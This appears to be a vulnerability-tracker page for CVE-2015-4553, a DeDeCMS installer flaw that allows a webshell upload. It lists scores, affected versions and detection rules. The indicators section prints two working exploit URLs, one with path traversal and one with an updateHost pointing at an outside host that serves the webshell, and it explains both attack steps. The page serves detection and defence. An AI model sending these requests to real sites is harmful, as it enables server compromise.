CVE-2015-4553
published 2020-01-06CVE-2015-4553: A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.
PriorityP274high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
56.74%
98.9th percentile
A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dedecms | dedecms | <= 5.6 | — |
| dedecms | dedecms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php↗
urlhttp://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://119.253.3.18:8000/↗
- →Detect HTTP requests to /install/index.php.bak with query parameter step=11, which triggers the vulnerable code path used to overwrite config_update.php and write arbitrary webshells. ↗
- →Alert on HTTP requests to /install/index.php.bak containing the parameter install_demo_name with path traversal sequences (e.g., '../') targeting config_update.php — Step 1 of the exploit clears the file to enable variable overwrite. ↗
- →Alert on HTTP requests to /install/index.php.bak containing the parameter updateHost pointing to an attacker-controlled external host — Step 2 causes the server to fetch and write a webshell from that host. ↗
- →Monitor for creation of new PHP files (e.g., hello.php) inside the /install/ directory, which is the webshell drop location used in this exploit. ↗
- →Monitor for the file ../data/admin/config_update.php being truncated to 0 bytes, which is the prerequisite condition for Stage 2 of the exploit. ↗
- →Detect outbound HTTP GET requests from the web server process matching the pattern /dedecms/demodata.<lang>.txt, which indicates the server is fetching attacker-controlled webshell content. ↗
- ·The exploit uses variable coverage (PHP variable overwrite) via unvalidated GET parameters in index.php.bak; the vulnerable file is a backup (.bak) of the installer that should not be publicly accessible post-installation. ↗
- ·Step 1 requires the install directory to still be present and accessible; the attack is only possible if the installer has not been removed after deployment. ↗
- ·The $updateHost variable in config_update.php is the critical control point; once config_update.php is zeroed out, the attacker can supply an arbitrary updateHost via GET parameter to redirect file fetching to an attacker-controlled server. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2020-01-06
Published